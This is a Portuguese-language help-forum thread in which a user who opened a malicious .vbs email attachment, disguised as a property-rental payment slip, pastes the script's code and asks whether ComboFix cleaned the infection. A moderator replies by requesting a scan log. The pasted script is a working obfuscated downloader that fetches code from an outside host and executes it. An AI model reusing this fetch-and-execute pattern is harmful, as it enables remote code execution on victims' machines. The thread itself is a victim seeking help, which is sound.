Ir ao conteúdo
  • Cadastre-se
Sbroggio

Abrir um malware sem querer

Recommended Posts

Bom dia galera,

estava esperando um boleto da imobiliária pra pagar, e quando chegou um e-mail com nome de boleto eu fui clicando sem ver muito bem o que era, o fato de estar no telefone também ajudou a me distrair, bom no final abri um arquivo .vbs . Só depois percebi que tinha feito *****,  eu passei o combofix na máquina e abrir ele com editar pra ver do que se tratava, mas meu conhecimento nesta área de programação fica apenas no básico de C ! :D:D Alguém sabe me informar como vejo se o combofix pode ter me livrado de um possível problema? Eu procurei no regedit por "favela" e não achei nada.

set favela = CreateObject(StrReverse("ptthlmx.tf"&"osorcim"))
favela.open StrReverse("teg") , "http://customerltda.info/?x=1" ,false
favela.setRequestHeader "content-type", "application/x-www-form-urlencoded"
favela.send "join=hug7"
comecopodeserfinal = StrReverse(favela.responseText)
execute(comecopodeserfinal)
md5="bm93YXl0"

Obrigado desde já

Compartilhar este post

Link para o post
Compartilhar em outros sites

@Sbroggio

Por favor, atente para o seguinte:

• Sobre o Fórum: Este é um espaço privado, não público. Seu uso é um privilégio, não um direito;
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • IMPORTANTE: Caso tenha programas de ativação do windows ou de compartilhamento de torrent, sugiro desinstalar. Só irei dar procedimento na analise após a remoção. Regras do forum;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Respeite a ordem das instruções passadas;
  • Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!

Ao invés de criar um novo tópico, peço que continue com este e faça uma resposta anexando o log do ZA-Scan, de acordo com as instruções do link abaixo.

http://www.clubedohardware.com.br/forums/topic/558719-leia-antes-de-postar/

Compartilhar este post

Link para o post

Olá Elias, não achei um lugar para baixar ZA-scan, achei alguns links porém estão todos quebrados. Sobre torrent eu tenho um sim em meu computador mas não o executo a muito tempo e ele também não é aberto sem eu saber, vejo isso pelos processos do gerenciador de tarefas. Você tem um link segura para baixar o ZA-Scan?

Obrigado

Compartilhar este post

Link para o post
Visitante
Este tópico está impedido de receber novos posts.

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais